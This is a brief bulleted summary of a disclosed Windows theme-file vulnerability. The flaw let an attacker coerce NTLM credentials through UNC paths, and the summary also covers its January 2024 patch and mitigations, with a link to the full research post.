- 💡 Akamai security researcher Tomer Peled discovered a spoofing vulnerability in Microsoft Themes, allowing an attacker to coerce NTLM credentials.
- 💻 The vulnerability affects all Windows versions and was fixed in January’s Patch Tuesday 2024.
- 🔒 Exploiting the vulnerability requires the victim to download a theme file, triggering an automatic authentication coercion attack.
- 🔄 The attack works by changing values in the theme file to UNC paths pointing to an attacker-controlled server, leading to credential sending.
- ⚠️ With NTLM credentials, an attacker can perform an NTLM relay attack or crack the victim’s password.
- 🛠️ Microsoft patched the vulnerability by adding checks for UNC paths in theme files.
- 🛡️ Mitigation involves blocking NTLM authentication in SMB, using group policies, and implementing microsegmentation.
- 📅 The vulnerability was disclosed to Microsoft in September 2023 and patched in January 2024.
Full Post :
https://www.akamai.com/blog/security-research/leaking-ntlm-credentials-through-windows-themes